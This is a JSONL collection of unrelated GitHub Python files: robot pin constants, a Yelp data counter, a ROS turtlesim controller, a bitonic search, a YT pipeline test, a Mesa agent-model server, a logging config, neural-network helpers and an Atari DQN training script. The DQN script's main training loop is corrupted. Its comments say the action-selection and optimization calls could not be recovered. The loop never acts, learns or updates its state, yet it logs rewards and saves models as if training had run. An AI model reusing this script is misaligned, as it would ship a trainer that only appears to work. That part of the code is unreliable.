+{"seq_id":"9507502845","text":"# Pins\nMOTOR1PIN1 = 26 # BOARD 37\nMOTOR1PIN2 = 19 # BOARD 35\nMOTOR1PIN3 = 13 # BOARD 33\nMOTOR1PIN4 = 6 # BOARD 31\n\nMOTOR2PIN1 = 21 # BOARD 40\nMOTOR2PIN2 = 20 # BOARD 38\nMOTOR2PIN3 = 16 # BOARD 36\nMOTOR2PIN4 = 12 # BOARD 32\n\nLEDPIN = 25 # BOARD 22\n\nSTART_CLEANING_PIN = 1 # BOARD 27\nDONE_CLEANING_PIN = 0 # BOARD 28\nSTOP_PIN = 5 # BOARD 29\n# BOARD 30 COMMON GND\n\nMOTOR1 = [MOTOR1PIN1, MOTOR1PIN2, MOTOR1PIN3, MOTOR1PIN4] # LONG \nMOTOR2 = [MOTOR2PIN1, MOTOR2PIN2, MOTOR2PIN3, MOTOR2PIN4] # SHORT\n\n# Colors\nPOSITIVE_GREEN = \"#6eff56\"\nNEGATIVE_RED = \"#ff3333\"\nCONFUSED_YELLOW = \"#fcff56\"\n\n# Distance\nHALF_STEPS_TO_1CM = 48.75\nGRID_SIDE_LENGTH = 3.2\nMAX_MOVES = 5\n","repo_name":"wilburlua910/CSC3003_OIP","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"12412175603","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 28 09:17:50 2022\n\n@author: storm\n\"\"\"\n\nimport json\nimport csv \nimport pandas as pd\n\ndata_business = []\n\n#10k lines - D:/Documents - HDD/GitHub/F22-DV4-03/Test for yelp datasets/yelp_academic_dataset_business_10000lines.json\n#full data - D:/ONEDRIVE_FREE_FOLDER/Uni-Datavidenskab/YELP/yelp_academic_dataset_business.json\n\nwith open('D:/ONEDRIVE_FREE_FOLDER/Uni-Datavidenskab/YELP/yelp_academic_dataset_business.json', encoding=\"utf8\") as f:\n    for line in f:\n        data_business.append(json.loads(line))\n    \n\n\n\n\n\ndef string_seperate(string):\n    n = 0\n    cate_list = []\n    string = string.replace('\"','')\n    string = string.replace('}','')\n    string = string.replace('{','')\n    a_list = string.split(\", \")\n    for element in a_list:\n        cate_list.append(element)\n        n = n +1\n    return cate_list\n\n\n\n#Counts how many of each attribute that exists\n# mydict = {}\n# n = 0\n# 
attribute_list = []\n# value_list = [] \n# for i in data_business:\n# if data_business[n]['attributes'] != None:\n# keys, values = zip(*data_business[n]['attributes'].items())\n# for element in keys:\n# mydict[element] = mydict.get(element, 0) + 1\n# n = n + 1\n# if n % 1000 == 0:\n# print(n) \n\n# print(mydict)\n# df = pd.DataFrame(list(mydict.items()),columns = ['Attribute','Amount'])\n\n# df_sorted = df.sort_values(by='Amount', ascending=False)\n\n# df_sorted.to_csv('amount_of_attributes.csv', index=False) \n\n\n \n# n = 0\n# big_string = \"\"\n# for i in data_business:\n# if data_business[n]['attributes'] != None:\n# big_string = big_string + str(data_business[n]['attributes']) \n# n = n + 1\n# if n % 1000 == 0:\n# print(n) \n\n# print(big_string)\n\n# values = data_business[11]['attributes']['Ambience']['hipster']\n\n# print(values)\n# Counts how many of each attribute that exists\nmydict = {}\nn = 0\nattribute_list = []\nvalue_list = [] \nfor i in data_business:\n try:\n catagory_list = string_seperate(data_business[n]['attributes']['DietaryRestrictions'])\n for element in catagory_list:\n mydict[element] = mydict.get(element, 0) + 1\n n = n + 1\n if n % 1000 == 0:\n print(str(round(n/1500,2))+\"% done\")\n except:\n n = n + 1\n if n % 1000 == 0:\n print(str(round(n/1500,2))+\"% done\")\n \ndf = pd.DataFrame(list(mydict.items()),columns = ['Atmosphere','Amount'])\n\ndf_sorted = df.sort_values(by='Amount', ascending=False)\n\ndf_sorted.to_csv('DietaryRestrictions.csv', index=False) ","repo_name":"AAU-WebDataScience/F22-DV4-03","sub_path":"misc/count_attributes.py","file_name":"count_attributes.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70143552553","text":"#!/usr/bin/env python3\nfrom soupsieve import select\nimport math\nimport rclpy\nfrom functools import partial\nfrom rclpy.node import Node\nfrom turtlesim.msg import Pose\nfrom geometry_msgs.msg import Twist\nfrom my_robot_interfaces.msg import Turtle\nfrom my_robot_interfaces.msg import TurtleArray\nfrom my_robot_interfaces.srv import CatchTurtle\n\nclass TurtleControllerNode(Node): # MODIFY NAME\n def __init__(self):\n super().__init__(\"turtle_controller\") # MODIFY NAME\n self.turtle_to_catch = None\n #self.x_target = 4.0\n #self.y_target = 8.0\n \n self.pose_ = None\n self.pose_subscriber_ = self.create_subscription(\n Pose, \"turtle1/pose\", self.callback_turtle_pose, 10)\n \n self.alive_turtle_subscriber_ = self.create_subscription(\n TurtleArray, \"alive_turtles\", self.callback_alive_turtles, 10)\n self.cmd_vel_publisher_ = self.create_publisher(Twist, \"/turtle1/cmd_vel\", 10)\n\n self.control_loo_timer_ = self.create_timer(0.01, self.control_loop)\n\n def callback_turtle_pose(self, msg):\n self.pose_ = msg\n \n def callback_alive_turtles(self, msg):\n if len(msg.turtles)>0:\n self.turtle_to_catch = msg.turtles[0]\n \n\n def control_loop(self):\n if self.pose_ == None or self.turtle_to_catch == None:\n return\n \n x_dist = self.turtle_to_catch.x - self.pose_.x\n y_dist = self.turtle_to_catch.y - self.pose_.y\n target_dist = math.sqrt(x_dist * x_dist + y_dist * y_dist)\n\n msg = Twist()\n if target_dist > 0.5:\n #pose\n msg.linear.x = 2 * target_dist # tuning the distance by multiplying with 2 for better path \n\n #orientation\n target_theta = math.atan2(y_dist, x_dist)\n diff = target_theta - self.pose_.theta\n\n #normalize the angle\n if diff > math.pi:\n diff -= 2 * math.pi\n elif diff < -math.pi:\n diff += 2 
* math.pi\n\n msg.angular.z = 6 * diff # tuning the angle by multiplying with 6 for better path \n \n\n else:\n #target reached \n msg.linear.x = 0.0\n msg.angular.z = 0.0\n self.call_catch_turtle_server(self.turtle_to_catch.name)\n self.turtle_to_catch = None\n\n self.cmd_vel_publisher_.publish(msg)\n\n def call_catch_turtle_server(self, turtle_name):\n client = self.create_client(CatchTurtle, \"catch_turtle\")\n while not client.wait_for_service(1.0):\n self.get_logger().warn(\"Waiting for Server...\")\n\n request = CatchTurtle.Request()\n request.name = turtle_name\n\n future = client.call_async(request)\n future.add_done_callback(\n partial(self.callback_call_catch_turtle, turtle_name=turtle_name))\n\n def callback_call_catch_turtle(self, future, turtle_name):\n try:\n response = future.result()\n if not response.success:\n self.get_logger().error(\"Turtle\" + str(turtle_name) + \"could not be caught\")\n\n except Exception as e:\n self.get_logger().error(\"Service call failed %r\" % (e,))\n\n\n\ndef main(args=None):\n rclpy.init(args=args)\n node = TurtleControllerNode() # MODIFY NAME\n rclpy.spin(node)\n rclpy.shutdown()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"chch1019/turtlesimsim_catch_them_all_py","sub_path":"turtlesimsim_catch_them_all_py/turtle_controller.py","file_name":"turtle_controller.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11491612059","text":"class Solution:\n # @param A : list of integers\n # @param B : integer\n # @return an integer\n def BinarySearch(self, A, l, r, b, order=1):\n while l <= r:\n mid = l + (r-l+1)//2\n if A[mid] == b:\n return mid\n elif A[mid] > b:\n if order == 1:\n r = mid - 1\n else:\n l = mid + 1\n else:\n if order == 1:\n l = mid + 1\n else:\n r = mid - 1\n return -1\n\n def BitonicSearch(self, arr, l, r):\n while l <= r:\n mid = l + (r-l+1)//2\n if arr[mid] > arr[mid-1]:\n ans = mid\n l = mid + 1\n else:\n r = mid - 1\n return ans\n\n def solve(self, A, B):\n\n if A[0] == B:\n return 0\n if A[-1] == B:\n return len(A) - 1\n\n start = 0\n end = len(A)-1\n\n bitonic_index = self.BitonicSearch(A, 0, len(A)-1)\n sa1 = sa2 = -1\n sa1 = self.BinarySearch(A, 0, bitonic_index, B)\n sa2 = self.BinarySearch(A, bitonic_index+1, len(A)-1, B, -1)\n return max(sa1, sa2)\n\n\nif __name__ == '__main__':\n s = Solution()\n A = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 20, 19, 18, 17, 16, 15, 14, 13, 12, 11]\n B = 12\n print(s.solve(A, B))\n","repo_name":"akashdeep3194/Scaler","sub_path":"d48/Search in Bitonic Array!.py","file_name":"Search in Bitonic Array!.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"83943269","text":"import logging\n\nimport yatest.common\n\nfrom crypta.lib.python.yt import schema_utils\nfrom crypta.lib.python.yt.test_helpers import (\n tables,\n tests,\n)\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_app_info_schema():\n return schema_utils.yt_schema_from_dict({\n \"BundleId\": \"string\",\n \"PlatformID\": \"uint64\",\n \"RegionName\": \"string\",\n \"Title\": \"string\",\n \"VendorName__raw\": \"string\",\n })\n\n\ndef get_apps_clustering_schema():\n return schema_utils.yt_schema_from_dict({\n \"app_id\": \"uint64\",\n \"bundle_id\": \"string\",\n \"cluster_id\": \"uint64\",\n \"devids_count\": \"uint64\",\n \"id_type\": \"string\",\n })\n\n\ndef test_build_apps_for_suggester(clean_local_yt, config, 
config_file, local_yt_and_yql_env):\n    return tests.yt_test(\n        yt_client=clean_local_yt.get_yt_client(),\n        binary=yatest.common.binary_path(\"crypta/siberia/bin/custom_audience/build_apps_for_suggester/bin/crypta-siberia-custom-audience-build-apps-for-suggester\"),\n        args=[\n            \"--config\", config_file,\n        ],\n        data_path=yatest.common.test_source_path(\"data\"),\n        input_tables=[\n            (tables.get_yson_table_with_schema(\n                'app_info.yson',\n                config.RmpAppsPath,\n                schema=get_app_info_schema(),\n            ), (tests.TableIsNotChanged())),\n            (tables.get_yson_table_with_schema(\n                'apps_clustering.yson',\n                config.AppsClusteringPath,\n                schema=get_apps_clustering_schema(),\n            ), (tests.TableIsNotChanged())),\n        ],\n        output_tables=[\n            (tables.YsonTable('apps.yson', config.OutputPath, yson_format=\"pretty\"), [tests.Diff()]),\n        ],\n        env=local_yt_and_yql_env,\n    )\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"crypto/test/main (79).py","file_name":"main (79).py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"15757833702","text":"from mesa.visualization.ModularVisualization import ModularServer\nfrom mesa.visualization.UserParam import UserSettableParameter\nfrom mesa.visualization.modules import CanvasGrid, ChartModule\n\nfrom src.money_model.model import MoneyModel\n\n\ndef agent_portrayal(agent):\n    \"\"\"\n    Rendering portrayal of an agent\n    :param agent: agent to render\n    :return: portrayal dict\n    \"\"\"\n    portrayal = {\"Shape\": \"circle\",\n                 \"Filled\": \"true\"\n                 }\n\n    if agent.wealth > 0:\n        portrayal[\"Color\"] = \"red\"\n        portrayal[\"Layer\"] = 0\n        portrayal[\"r\"] = 0.5\n    else:\n        portrayal[\"Color\"] = \"grey\"\n        portrayal[\"Layer\"] = 1\n        portrayal[\"r\"] = 0.2\n\n    return portrayal\n\n\n# canvas grid with dimensions 10 x 10, drawn in 500 x 500 pixels\ngrid = CanvasGrid(agent_portrayal, 10, 10, 500, 500)\n\n# plot gini\nchart = ChartModule([{\"Label\": \"Gini\",\n                      \"Color\": \"black\"\n                      }],\n                    data_collector_name=\"datacollector\"\n                    )\n\n# user-definable number of agents\n# parameter changes don't take place until the model is reset\nn_slider = UserSettableParameter(\"slider\", \"Number of Agents\", 100, 2, 200, 1)\n\n# create server\nserver = ModularServer(MoneyModel,\n                       [grid, chart],\n                       \"Money Model\",\n                       {\"N\": n_slider, \"width\": 10, \"height\": 10})\nserver.port = 8521  # default\nserver.launch()\n","repo_name":"SZanlongo/mesa-tutorial","sub_path":"src/money_model/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"24571050929","text":"import os\nimport logging.config\nfrom tools.config_loader import conf\nfrom datetime import datetime\nfrom config.settings import Settings\n\n\nstandard_format = '[%(asctime)s] [%(levelname)s] [%(threadName)s] [%(name)s] | %(message)s'\nsimple_format = '[%(asctime)s] [%(levelname)s] [%(filename)s:%(lineno)d] | %(message)s'\n\nlogfile_dir = os.path.join(Settings.base_dir, 'log')\nlogfile_name = 'log{0}.log'.format(datetime.now().strftime('%Y-%m-%d'))\nos.makedirs(logfile_dir) if not os.path.isdir(logfile_dir) else ...\nlogfile_path = os.path.join(logfile_dir, logfile_name)\n\n\nLOGGING_DIC = {\n    'version': 1,\n    'disable_existing_loggers': False,\n    'formatters': {\n        'standard': {\n            'format': standard_format\n        },\n        'simple': {\n            'format': simple_format\n        },\n    },\n    'filters': {}, # filters can be left undefined\n    'handlers': {\n        # logs printed to the terminal\n        'console': {\n            'level': conf.get(\"terminal.level\"),\n            'class': 'logging.StreamHandler', # print to the screen\n            'formatter': 'simple'\n        },\n        # logs written to a file; collects records at info level and above\n        'default': {\n            'level': conf.get(\"logger.level\"),\n            'class': 'logging.handlers.RotatingFileHandler',\n            'formatter': 'standard',\n            'filename': logfile_path,\n            'maxBytes': 1024 * 1024 * 100, # log file size: 100M (*****)\n            'backupCount': 5,\n            'encoding': 'utf-8',\n        },\n    },\n    'loggers': {\n        '': {\n            'handlers': ['default', 'console'],\n            'level': conf.get(\"logger.level\").upper(),\n            'propagate': False, # propagate upward (to higher-level loggers)\n        },\n    },\n}\n\n\nlogging.config.dictConfig(LOGGING_DIC) # load the logging config defined above\nlogger = logging.getLogger(__name__) # create a logger instance\n\n\n","repo_name":"Zhangwenke-git/execution-engine","sub_path":"tools/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"22596222396","text":"# -*- coding: utf-8 -*-\n\n# opt_utils.py\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sklearn\nimport sklearn.datasets\nimport operator\nfrom functools import reduce\n\ndef sigmoid(Z):\n    \"\"\"\n    Implements the sigmoid activation in numpy\n\n    Arguments:\n    Z -- numpy array of any shape\n\n    Returns:\n    A -- output of sigmoid(z), same shape as Z\n    cache -- returns Z as well, useful during backpropagation\n    \"\"\"\n\n    A = 1/(1+np.exp(-Z))\n    cache = Z\n\n    return A, cache\n\ndef sigmoid_backward(dA, cache):\n    \"\"\"\n    Implement the backward propagation for a single SIGMOID unit.\n\n    Arguments:\n    dA -- post-activation gradient, of any shape\n    cache -- 'Z' where we store for computing backward propagation efficiently\n\n    Returns:\n    dZ -- Gradient of the cost with respect to Z\n    \"\"\"\n\n    Z = cache\n\n    s = 1/(1+np.exp(-Z))\n    dZ = dA * s * (1-s)\n\n    assert (dZ.shape == Z.shape)\n\n    return dZ\n\ndef relu(Z):\n    \"\"\"\n    Implement the RELU function.\n\n    Arguments:\n    Z -- Output of the linear layer, of any shape\n\n    Returns:\n    A -- Post-activation parameter, of the same shape as Z\n    cache -- a python dictionary containing \"A\" ; stored for computing the backward pass efficiently\n    \"\"\"\n\n    A = np.maximum(0,Z)\n\n    assert(A.shape == Z.shape)\n\n    cache = Z\n    return A, cache\n\ndef relu_backward(dA, cache):\n    \"\"\"\n    Implement the backward propagation for a single RELU unit.\n\n    Arguments:\n    dA -- post-activation gradient, of any shape\n    cache -- 'Z' where we store for computing backward propagation efficiently\n\n    Returns:\n    dZ -- Gradient of the cost with respect to Z\n    \"\"\"\n\n    Z = cache\n    dZ = np.array(dA, copy=True) # just converting dz to a correct object.\n\n    # When z <= 0, you should set dz to 0 as well.\n    dZ[Z <= 0] = 0\n\n    assert (dZ.shape == Z.shape)\n\n    return dZ\n\n\n\n\n\ndef initialize_parameters(layer_dims):\n\n\n    np.random.seed(3)\n    parameters = {}\n    L = len(layer_dims) # number of layers in the network\n\n    for l in range(1, L):\n        parameters['W' + str(l)] = np.random.randn(layer_dims[l], layer_dims[l - 1]) * np.sqrt(2 / layer_dims[l - 1])\n        parameters['b' + str(l)] = np.zeros((layer_dims[l], 1))\n\n        # assert (parameters['W' + str(l)].shape == layer_dims[l], layer_dims[l - 1])\n        # assert (parameters['W' + str(l)].shape == layer_dims[l], 1)\n\n    return parameters\n\n\ndef linear_activation_forward(A_prev, W, b, activation):\n    \"\"\"\n    Implement the forward propagation for the LINEAR->ACTIVATION layer\n\n    Arguments:\n    A_prev - activations from the previous layer (or the input layer), of shape (size of previous layer, number of examples)\n    W - weight matrix, numpy array of shape (size of current layer, size of previous layer)\n    b - bias vector, numpy array of shape (size of current layer, 1)\n    activation - the activation to use in this layer, as a string: [\"sigmoid\" | \"relu\"]\n\n    Returns:\n    A - the output of the activation function, also called the post-activation value\n    cache - a tuple containing \"linear_cache\" and \"activation_cache\", stored for computing the backward pass efficiently\n    \"\"\"\n\n    if activation == \"sigmoid\":\n        Z, linear_cache = linear_forward(A_prev, W, b)\n        A, activation_cache = sigmoid(Z)\n    elif activation == \"relu\":\n        Z, linear_cache = linear_forward(A_prev, W, b)\n        A, activation_cache = relu(Z)\n\n    assert (A.shape == (W.shape[0], A_prev.shape[1]))\n    cache = (linear_cache, activation_cache)\n\n    return A, cache\n\n\ndef linear_forward(A, W, b):\n    \"\"\"\n    Implement the linear part of forward propagation.\n\n    Arguments:\n    A - activations from the previous layer (or the input data), of shape (size of previous layer, number of examples)\n    W - weight matrix, numpy array of shape (size of current layer, size of previous layer)\n    b - bias vector, numpy array of shape (size of current layer, 1)\n\n    Returns:\n    Z - the input of the activation function, also called the pre-activation parameter\n    cache - a tuple containing \"A\", \"W\" and \"b\", stored for computing the backward pass efficiently\n    \"\"\"\n    Z = np.dot(W, A) + b\n    assert (Z.shape == (W.shape[0], A.shape[1]))\n    cache = (A, W, b)\n\n    return Z, cache\n\n\ndef forward_propagation(X, parameters):\n    caches = []\n    A = X\n    L = len(parameters) // 2\n    for l in range(1, L):\n        A_prev = A\n        A, cache = linear_activation_forward(A_prev, parameters['W' + str(l)], parameters['b' + str(l)], \"relu\")\n        caches.append(cache)\n\n    AL, cache = linear_activation_forward(A, parameters['W' + str(L)], parameters['b' + str(L)], \"sigmoid\")\n    caches.append(cache)\n\n    assert (AL.shape == (1, X.shape[1]))\n\n    return AL, caches\n\n\ndef linear_backward(dZ, lambd, cache):\n    \"\"\"\n    Implement the linear part of backward propagation for a single layer (layer l)\n\n    Arguments:\n    dZ - gradient of the cost with respect to the linear output (of the current layer l)\n    cache - tuple of values (A_prev, W, b) coming from the forward propagation in the current layer\n\n    Returns:\n    dA_prev - gradient of the cost with respect to the activation (of the previous layer l-1), same shape as A_prev\n    dW - gradient of the cost with respect to W (current layer l), same shape as W\n    db - gradient of the cost with respect to b (current layer l), same shape as b\n    \"\"\"\n\n    A_prev, W, b = cache\n    m = A_prev.shape[1]\n    dW = np.dot(dZ, A_prev.T) / m + ((lambd * W) / m)\n    db = np.sum(dZ, axis=1, keepdims=True) / m\n    dA_prev = np.dot(W.T, dZ)\n\n    assert (dA_prev.shape == A_prev.shape)\n    assert (dW.shape == W.shape)\n    assert (db.shape == b.shape)\n\n    return dA_prev, dW, db\n\n\ndef linear_activation_backward(dA, cache, lambd,activation=\"relu\"):\n    linear_cache, activation_cache = cache\n    if activation == \"relu\":\n        dZ = relu_backward(dA, activation_cache)\n        dA_prev, dW, db = linear_backward(dZ, lambd, linear_cache)\n    elif activation == \"sigmoid\":\n        dZ = sigmoid_backward(dA, activation_cache)\n        dA_prev, dW, db = linear_backward(dZ, lambd, linear_cache)\n\n    return dA_prev, dW, db\n\n\ndef backward_propagation(AL, Y, caches,lambd):\n    grads = {}\n    L = len(caches)\n    m = AL.shape[1]\n    Y = Y.reshape(AL.shape)\n    dAL = - (np.divide(Y, AL) - np.divide(1 - Y, 1 - AL))\n\n    current_cache = caches[L-1]\n    grads[\"dA\" + str(L)], grads[\"dW\" + str(L)], grads[\"db\" + str(L)] = linear_activation_backward(dAL, current_cache, lambd,\"sigmoid\")\n\n    for l in reversed(range(L-1)):\n        current_cache = caches[l]\n        dA_prev_temp, dW_temp, db_temp = linear_activation_backward(grads[\"dA\" + str(l + 2)], current_cache,lambd, \"relu\")\n        grads[\"dA\" + str(l + 1)] = dA_prev_temp\n        grads[\"dW\" + str(l + 1)] = dW_temp\n        grads[\"db\" + str(l + 1)] = db_temp\n\n    return grads\n\n\ndef compute_cost(AL, Y,caches,lambd):\n    m = Y.shape[1]\n    cost = -np.sum(np.multiply(np.log(AL), Y) + np.multiply(np.log(1 - AL), 1 - Y)) / m\n\n    L = len(caches)\n    current_cache = caches[L - 1]\n    linear_cache, activation_cache = current_cache\n    A_prev, W, b = linear_cache\n    L2_regularization_cost = lambd *(np.sum(np.square(W)))/ (2 * m)\n\n    cost_all = cost + L2_regularization_cost\n\n    return cost_all\n\n\ndef predict(X, y, parameters):\n    \"\"\"\n    This function is used to predict the results of an n-layer neural 
network.\n\n Arguments:\n X -- data set of examples you would like to label\n parameters -- parameters of the trained model\n\n Returns:\n p -- predictions for the given dataset X\n \"\"\"\n\n m = X.shape[1]\n p = np.zeros((1, m), dtype=np.int)\n\n # Forward propagation\n a3, caches = forward_propagation(X, parameters)\n\n # convert probas to 0/1 predictions\n for i in range(0, a3.shape[1]):\n if a3[0, i] > 0.5:\n p[0, i] = 1\n else:\n p[0, i] = 0\n\n # print results\n\n # print (\"predictions: \" + str(p[0,:]))\n # print (\"true labels: \" + str(y[0,:]))\n print(\"Accuracy: \" + str(np.mean((p[0, :] == y[0, :]))))\n\n return p\n\n\ndef predict_dec(parameters, X):\n \"\"\"\n Used for plotting decision boundary.\n\n Arguments:\n parameters -- python dictionary containing your parameters\n X -- input data of size (m, K)\n\n Returns\n predictions -- vector of predictions of our model (red: 0 / blue: 1)\n \"\"\"\n\n # Predict using forward propagation and a classification threshold of 0.5\n a3, cache = forward_propagation(X, parameters)\n predictions = (a3 > 0.5)\n return predictions\n\n\ndef plot_decision_boundary(model, X, y):\n # Set min and max values and give it some padding\n x_min, x_max = X[0, :].min() - 1, X[0, :].max() + 1\n y_min, y_max = X[1, :].min() - 1, X[1, :].max() + 1\n h = 0.01\n # Generate a grid of points with distance h between them\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))\n # Predict the function value for the whole grid\n Z = model(np.c_[xx.ravel(), yy.ravel()])\n Z = Z.reshape(xx.shape)\n # Plot the contour and training examples\n plt.contourf(xx, yy, Z, cmap=plt.cm.Spectral)\n plt.ylabel('x2')\n plt.xlabel('x1')\n #plt.scatter(X[0, :], X[1, :], c=y, cmap=plt.cm.Spectral)\n plt.scatter(X[0, :], X[1, :], c=reduce(operator.add, y), cmap=plt.cm.Spectral)\n plt.show()\n\n\ndef load_dataset(is_plot=True):\n np.random.seed(3)\n train_X, train_Y = sklearn.datasets.make_moons(n_samples=300, noise=.2) # 300 #0.2\n # Visualize the data\n if is_plot:\n plt.scatter(train_X[:, 0], train_X[:, 1], c=train_Y, s=40, cmap=plt.cm.Spectral);\n train_X = train_X.T\n train_Y = train_Y.reshape((1, train_Y.shape[0]))\n\n return train_X, train_Y","repo_name":"WZJ2333/CNN_Andrew","sub_path":"opt_utils.py","file_name":"opt_utils.py","file_ext":"py","file_size_in_byte":9610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23216835167","text":"import torch\nimport sys\nimport os\nfrom copy import deepcopy\nimport numpy as np\nimport time\n\nfrom NetworkAtari import Atari_2600\nfrom utils import select_action, save, eval_model\nfrom init_atari import init\nfrom optim import optimize_model\n\nfrom ResNet_18_Atari import resnet\n\nuse_cuda = torch.cuda.is_available()\nFloatTensor = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor\nTensor = FloatTensor\n\ndef training_Atari(game_name, model, GAMMA=0.99, EPS_START = 1, EPS_END = 0.01,\n iter_param = 1e4, max_frame = 50000000,\n mem_size = int(1e4), momentum = 0.95):\n \"\"\"\n ** Arguments\n Model Deep Learning architecture Resnet18 (resnet)\n or classic DeepMind model (Atari_2600)\n game_name Name of the game\n BATCH_SIZE Size of the batch\n GAMMA Discount factor\n EPS_START Initial value in epsilon greedy exploration\n EPS_END Final value in epsilon greedy exploration\n iter_END nb of frames over wich epsilon is linearly\n annealed to its final value\n iter_param frequency with which we update target network\n max_frame Maximum number of 
training frames\n    mem_size              Size of the Replay memory\n    lr                    Learning rate\n    momentum              Momentum\n    \n    This algorithm is used for two different architectures: Resnet and more\n    classical CNNs like the DeepMind model for Atari\n    \"\"\"\n\n    start = time.time()\n    \n    if model == resnet:\n        mod = 'resnet'\n        lr = 2.5e-4\n        BATCH_SIZE=64\n        save_test = 50\n        iter_END = 100000\n        \n    elif model==Atari_2600:\n        mod='dqn'\n        lr = 1e-4\n        BATCH_SIZE=256\n        save_test=200\n        iter_END = 1000000\n        \n    recover = input(\"Do you want to resume a previous training? (y/n) \").lower()\n    controller = False\n    while not controller:\n        if recover==\"n\":\n            #If you don't load a previous training it loads a model with\n            #random parameters\n            env, env_no_clipping, nb_actions, optimizer, memory, model_atari = \\\n            init(game_name,momentum,lr,model,mem_size,mod)\n            controller=True\n            counter_iter_param=1\n            session=0\n            \n        elif recover==\"y\":\n            env, env_no_clipping, nb_actions, optimizer, memory, _ = \\\n            init(game_name,momentum,lr,model,mem_size,mod)\n            name = input(\"Please enter the name of the file you want to load: \")\n            if os.path.exists(name):\n                if use_cuda:\n                    model_atari = torch.load(name)\n                else:\n                    model_atari=torch.load(name, map_location=lambda storage, \n                                            loc: storage)\n                controller=True\n                counter_iter_param = int(input(\"\"\"Please enter the number of \n                frames viewed in the last session: \"\"\"))\n                session = int(input(\"Please enter the session number: \"))\n            else:\n                print(\"This file doesn't exist\")\n        else:\n            recover = input(\"Please answer y or n: \").lower()\n    \n    reward_list = []\n    eval_reward_list = []\n    model_atari_0 = deepcopy(model_atari)\n    eps_threshold = 1\n    for i_episode in range(1,int(1e6)):\n\n        print((i_episode,game_name,model_atari.name,eps_threshold))\n        \n        #We reset environment and make appropriate transformation on raw pixel\n        state = env.reset()\n        state = torch.from_numpy(np.array(state)).float()\n        state = state.transpose(0,2).transpose(1,2).unsqueeze(0)\n        if use_cuda:\n            state = state.cuda()\n\n        tot_reward = 0\n        step = 0\n        ended = done = False\n        while (not done) and (not ended):\n            #Update of the epsilon: annealed linearly from EPS_START to\n            #EPS_END over iter_END frames, as the docstring describes\n            #(assumed reconstruction of a corrupted passage)\n            if counter_iter_param < iter_END:\n                eps_threshold = EPS_START - counter_iter_param * (EPS_START - EPS_END) / iter_END\n            else:\n                eps_threshold = EPS_END\n            counter_iter_param += 1\n            #The original action-selection / replay / optimize_model calls\n            #are not recoverable from this copy of the file\n            ended = (counter_iter_param >= max_frame)\n            step += 1\n            done = done or (step >= 18000)\n        reward_list.append((counter_iter_param,i_episode,tot_reward))\n        \n        \n        if i_episode%save_test==0 or ended:\n            evaluation = eval_model(env_no_clipping,model_atari,nb_actions)\n            eval_reward_list.append((counter_iter_param,i_episode,evaluation))\n            print(\"Saved\")\n            #We save data in different files that can be loaded after training\n            save(eval_reward_list,\"evaluation_model_{}_{}.txt\".format(game_name,model_atari.name))\n            save(reward_list,\"current_results_{}_{}.txt\".format(game_name,model_atari.name))\n            torch.save(model_atari,\"model_atari_repr{}_{}_{}.pkl\".format(session,game_name,model_atari.name))\n        if ended:\n            break\n\n    \n    end = time.time()\n    t = end-start\n    save(t,\"run_time_{}_{}.txt\".format(game_name,model_atari.name))\n    return 'Fin'\n\n\n\n\nif __name__ == '__main__':\n    if use_cuda:\n        print(\"Using CUDA\")\n    else:\n        print(\"WARNING: Cuda not available\")\n\n    assert len(sys.argv) > 2, \"Please give the name of the game as argument\"\n    model = sys.argv[2]\n    if model == \"resnet\":\n        training_Atari(sys.argv[1], model = resnet)\n    elif model == \"dqn\":\n        training_Atari(sys.argv[1], model = Atari_2600)\n    else:\n        assert False, \"Unknown model\"\n    \n","repo_name":"deepadawan/Res_DQN","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
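A hedged aside on the record above: the Res_DQN loop delegates the actual learning step to the imported optimize_model. As a self-contained illustration (not code from that repository; dqn_target and its signature are hypothetical), the bootstrap target a standard DQN update regresses toward can be sketched as:

import torch

def dqn_target(reward, next_q_values, done, gamma=0.99):
    # Standard Q-learning target (assumed, for illustration):
    # y = r if the episode ended at s', else y = r + gamma * max_a Q(s', a).
    # The (1.0 - done) mask turns off bootstrapping at terminal states.
    return reward + gamma * next_q_values.max(dim=1).values * (1.0 - done)

# Example with a batch of two transitions:
r = torch.tensor([1.0, 0.0])
q_next = torch.tensor([[0.5, 2.0], [1.0, 0.3]])
d = torch.tensor([0.0, 1.0])
print(dqn_target(r, q_next, d))  # tensor([2.9800, 0.0000])

Storing a done flag with every transition in the replay memory is what makes this masked, branch-free form possible.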
